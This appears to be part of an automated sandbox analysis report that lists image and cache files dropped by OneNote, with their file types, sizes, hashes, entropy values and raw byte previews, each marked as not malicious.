Preview:	2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ\|.......\|..........c.d.\|..........c.d.\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................P.....aZ...r....N...^................{8d.4.I.`#t,hu.........f........................................I.qk..B.....LZ...............P.....aZ...r...........P.....aZ...r.........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|...B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.363588677494053
Encrypted:	false
SSDEEP:	48:2sN1mGPZ/0pt+WaEpoX395dvo1rdqrvCFF7RXW9dGsWe3d:2s9Z/0pmE6X39XvcRyvQq3
MD5:	D0F3F7B8B5C060520447E6510A969482
SHA1:	C9DBEA2349562FCA079B78F1D72378511B222EBC
SHA-256:	43C7E37BF4E0073C91F9AA3BCB5F5353A7D573DFB7992C3EEA442A0060A4DCB2
SHA-512:	3E8E8BDB11CC7E759AAFFBB67D9A5E6198553E925475CD50766CD1C7C6CE35C49B9D55C4C5F729DA57162C5DFCA613685CA91ED9329EAE8B3A10077DB2DF8AD6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ............\|.....;...[....\|.....;...[.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............#..x...\9........N...^...............#..:+/?B....Q:i.........f........................................I.qk..B.....LZ..............#..x...\9..............#..x...\9............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.254894425226721
Encrypted:	false
SSDEEP:	96:SsgLOidl5sVrM+WEc0qLXquB9nHXtVnqJdgR0TqPr3Oxxt7P:SsgLOidlyrxc9XquB9HXwgR0U3Oxxt7
MD5:	28B16AF484EFD103E0CC1790AB569332
SHA1:	B3B2366EF6482EDD3A96F02A067BBEA94AF7F555
SHA-256:	8EE60D5CB35853AE4DE2E694DB8C4AD02E8D3644BB9C45D9803DCC2876422DA8
SHA-512:	FC4454974110B6B9ECF5BF4C5C3A2B513D043B87D44E409F61534AFB8386ABC01097073438E27352CA518B16F0A4B6D81DC74CF8A10D7EC91CADD64B38C451A7
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ.A......A"......<..),.A"......<..),.A..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................^.w...lw=..4.....N...^...............(...%.E.#<.%.D.........&...................................>....I.qk..B.....LZ...............^.w...lw=..4............^.w...lw=..4...........A......A......A..........................................Aj.....AT.a...A......A..D...AH.....A..N...A..?.#.A..9...................;........4...4...4.."...............A..A..A..z...y.. x.. ...........$........4.....7..7...........Op.b..F.$..i.................;........4...4...4..........A......A....#.*A............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000071.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.326477479467443
Encrypted:	false
SSDEEP:	48:YuOsS7YRWxvBt7O1Eya7PXW67h9P46jddrd3rPhxNuKRX5Ddn5R:Yhs/0xvBsEyaTXWkh9PDPRbPcKH
MD5:	1320CCF509CA2642ECCCC61559C5CE99
SHA1:	A71FABBAEAEC0375022C3483FBF5B1A284629CEE
SHA-256:	1AA0D20221DD41FA3A8891BE226D97CF7E11C9BA9CAC51A7013E7220D80EC0AA
SHA-512:	A4929270129FEE9C240C91D31515549760C2E9C5F4D6FA8659279B3D2EEDA80D215FBC033805FCDDD2796B6203101E11FE65470EECD2D7E109845DA526FDAAF6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.>s......>s.f.{.........>s.f.{.........>s..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............X.m.&I...[........N...^...............)f)D(_yE..z.W.. ........f........................................I.qk..B.....LZ.............X.m.&I...[.............X.m.&I...[..............>s......>s......>s..........................................>sj.....>sT.]...>s......>s..B...>sH.....>s..B...>s..>.).>s..J...................;........4...4...4.."...............>s..>s..>s..z...y.. x.. ...........$........4.....7..7........................;........4...4...4..........>s......>s....#.>s............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000074.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.397320180908868
Encrypted:	false
SSDEEP:	48:zW2K+xfsjx88WI0a/tmqBEr+vwiX9i98Qj4V7rd3rQxTn0dXcrY26Oh:0+xfsa8Wja/lEMlXQ98Qy7Rbk06kG
MD5:	8F10CCADBA55EC0B78254D2BA0F8179A
SHA1:	991337009E195AF177BFCCA3CECE2B55CFD3D036
SHA-256:	1017FC1F876B0714DC5632CB3999A6B2C5AEDB897AB02C4E31EBDA8D26F0F122
SHA-512:	803DD7768C96FAD6449601E6504A22FFFD713ECB19C18E34BC2BA220BD6A4AC123427C2EF877B698FD1AE50C145D59372BCD44E858E641BEC8EF41DB164CAFCB
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.........c..Z...N-h(....c..Z...N-h(......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................:g..;o=)......N...^..................r..N.tC=&J..........f........................................I.qk..B.....LZ................:g..;o=)..............:g..;o=)......................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000077.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318159356013569
Encrypted:	false
SSDEEP:	48:Yu6BsfufnyOdL1ytFkdPEHGKsX5+90OAj4hrd3rUQxLFdXL5ygROhWZn1jesB:YlsQ1yYEmrXs90OAERb9D
MD5:	082542947DBD1EF0EBC2C77E2DC32C86
SHA1:	E803AA3C159AF2F1B711D27F41AE0855E2C11D60
SHA-256:	BC66542863A45F556E8BAC518683EF0B39F8930BFFBEAFB0F33F1DC431DC37F5
SHA-512:	15C74BC39A5F1206FE4F6A03FE16C2728193B08901F01091DF2AA730AEC1CFAA588EB44485267E556E5DB7659EB54B6CA43F7CCB8462717807F4F9477AC70E4B
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.#S......#S...$...Ss....#S...$...Ss....#S..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............U..!....+-8.)T....N...^...............J.q\|.!.I.V.-...?........f........................................I.qk..B.....LZ..............U..!....+-8.)T..........U..!....+-8.)T..........#S......#S......#S..........................................#Sj.....#ST.]...#S......#S..B...#SH.....#S..B...#S..>.).#S..J...................;........4...4...4.."...............#S..#S..#S..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........#S......#S....#.#S............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000079.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.330092062035197
Encrypted:	false
SSDEEP:	96:2sRQ1EAeE8FXpacP9UIpXClRbzngcdD4x:2sRQiAr8FXMw9UIpXsRbkOD4
MD5:	A072FEB204BE13426D48DFDA2431D3E3
SHA1:	3460DF3841F11CB0C2C16D00E7773410F7861277
SHA-256:	270668B2205DF5D35265B7FD46DD5999C499D13E228A91C2C68155603D19167B
SHA-512:	679940BA427D0680B6EF56FD52F74BFA28D4FE830FDF0800FED9BF8EA870DEE733E3513DFE72B9ADA308450D7C7CAE2D6EA49B322DB2725963B942BBA4E3C6D2
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........x>(......!.Zo...x>(......!.Zo.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............X K.>o.....f......N...^................(Vb.u.I....ZXVA........f........................................I.qk..B.....LZ.............X K.>o.....f...........X K.>o.....f..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
